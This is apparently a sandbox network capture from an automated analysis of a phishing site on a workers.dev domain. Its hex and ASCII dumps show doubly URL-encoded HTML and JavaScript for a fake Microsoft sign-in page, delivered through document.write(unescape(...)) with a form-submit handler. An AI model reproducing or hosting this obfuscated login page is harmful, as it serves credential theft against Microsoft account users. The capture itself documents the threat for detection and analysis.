                                  2024-04-17 23:13:11 UTC1369INData Raw: 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35
                                  Data Ascii: class%253D%2522formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%25
                                  2024-04-17 23:13:11 UTC1369INData Raw: 33 43 2f 70 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                  Data Ascii: 3C/p%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%
                                  2024-04-17 23:13:11 UTC1369INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30
                                  Data Ascii: 0%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520
                                  2024-04-17 23:13:11 UTC1369INData Raw: 37 2e 6d 61 69 6c 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32
                                  Data Ascii: 7.mail%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2
                                  2024-04-17 23:13:11 UTC1369INData Raw: 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69
                                  Data Ascii: ne%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opaci
                                  2024-04-17 23:13:11 UTC1369INData Raw: 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35
                                  Data Ascii: 0A%250A%2520%2520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%25


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449736104.21.50.1034433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:11 UTC550OUTGET /style.css HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: text/css,*/*;q=0.1
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: style
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:11 UTC562INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:11 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1A%2BB2%2BRCkqYSTiQ6OaTI7soiJTg%2FCuNDZVioGsiV7jnzEgwVqcSvwb%2F8l3y%2BVesvhGr8l0taF7NWhx2GC5qNskMG%2BzLsphI%2Bqvx%2BDjHsWYAaPIAqq3SSN%2FEv2QLHjsx5yWesHmMR28%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601aae5b2044d1-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:11 UTC807INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:11 UTC1369INData Raw: 25 32 35 32 37 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35
                                  Data Ascii: %2527%2529%253B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%25
                                  2024-04-17 23:13:11 UTC1369INData Raw: 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35
                                  Data Ascii: on%257B%250A%2520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%25
                                  2024-04-17 23:13:11 UTC1369INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25
                                  Data Ascii: %2520%2520%2520display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%
                                  2024-04-17 23:13:11 UTC1369INData Raw: 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35
                                  Data Ascii: class%253D%2522formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%25
                                  2024-04-17 23:13:11 UTC1369INData Raw: 33 43 2f 70 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                  Data Ascii: 3C/p%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%
                                  2024-04-17 23:13:11 UTC1369INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30
                                  Data Ascii: 0%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520
                                  2024-04-17 23:13:11 UTC1369INData Raw: 37 2e 6d 61 69 6c 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32
                                  Data Ascii: 7.mail%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2
                                  2024-04-17 23:13:11 UTC1369INData Raw: 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69
                                  Data Ascii: ne%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opaci
                                  2024-04-17 23:13:11 UTC1369INData Raw: 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35
                                  Data Ascii: 0A%250A%2520%2520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%25


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.44973813.107.246.574433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:11 UTC659OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                  Host: aadcdn.msauth.net
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC800INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:11 GMT
                                  Content-Type: image/svg+xml
                                  Content-Length: 1435
                                  Connection: close
                                  Cache-Control: public, max-age=31536000
                                  Content-Encoding: gzip
                                  Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                  ETag: 0x8D79B8373CB2849
                                  x-ms-request-id: a0b77564-001e-004a-2b50-90389a000000
                                  x-ms-version: 2009-09-19
                                  x-ms-lease-status: unlocked
                                  x-ms-blob-type: BlockBlob
                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                  Access-Control-Allow-Origin: *
                                  x-azure-ref: 20240417T231311Z-18655757dbcxffsszfprzy3hq800000005vg000000009vur
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-04-17 23:13:12 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                  Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.44973713.107.246.574433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:11 UTC659OUTGET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                  Host: aadcdn.msauth.net
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC805INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:11 GMT
                                  Content-Type: image/svg+xml
                                  Content-Length: 621
                                  Connection: close
                                  Cache-Control: public, max-age=31536000
                                  Content-Encoding: gzip
                                  Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                  ETag: 0x8D8852A7FA6B761
                                  x-ms-request-id: cc1d3139-d01e-0037-335c-901581000000
                                  x-ms-version: 2009-09-19
                                  x-ms-lease-status: unlocked
                                  x-ms-blob-type: BlockBlob
